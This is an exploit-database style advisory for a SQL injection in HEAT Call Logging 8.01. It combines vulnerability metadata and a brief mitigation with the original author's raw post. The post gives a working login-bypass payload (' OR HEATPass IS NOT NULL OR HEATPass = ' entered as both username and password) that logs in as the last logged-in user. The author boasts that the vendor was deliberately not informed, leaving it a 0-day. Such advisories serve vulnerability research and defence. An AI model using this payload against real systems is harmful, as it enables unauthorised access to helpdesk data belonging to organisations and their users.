HEAT Call Logging Version 8.01

vendor:

HEAT

by:

antilimit

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: HEAT

Affected Version From: 08.01

Affected Version To: 9

Patch Exists: Unknown

Related CWE: None

CPE: frontrange.com/heat.aspx

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

Unknown

HEAT Call Logging Version 8.01

The vulnerability is a SQL injection vulnerability that allows an attacker to log in as the last logged in user by using the username ' OR HEATPass IS NOT NULL OR HEATPass = ' and the password ' OR HEATPass IS NOT NULL OR HEATPass = '.

Mitigation:

Ensure that all user input is validated and sanitized before being used in a SQL query.

Source

Exploit-DB raw data:

[=[ ;otokoyama; ]=]


-=[HEAT Call Logging Version 8.01]=-
"The HEAT family is a comprehensive service solution,
combining core technologies with a variety of expansion options,
so any enterprise can build a tailored solution."

-=[web]=-
http://www.frontrange.com/heat.aspx

-=[attack]=-
U:' OR HEATPass IS NOT NULL OR HEATPass = '
P:' OR HEATPass IS NOT NULL OR HEATPass = '

-=[Effect]=-
Logs in as last logged in user.
There would be many variations of the above, but who can be bothered.

-=[NOTICE]=-
Due to vendor and product distaste I have not informed them of this vuln.

I guess this is a 0-day then..

Via their webpage current version appears to be 9.0,
could apply to this version aswell

SHOUTS:4chan for being shit, yes I will troll in a POC.


antilimit owns you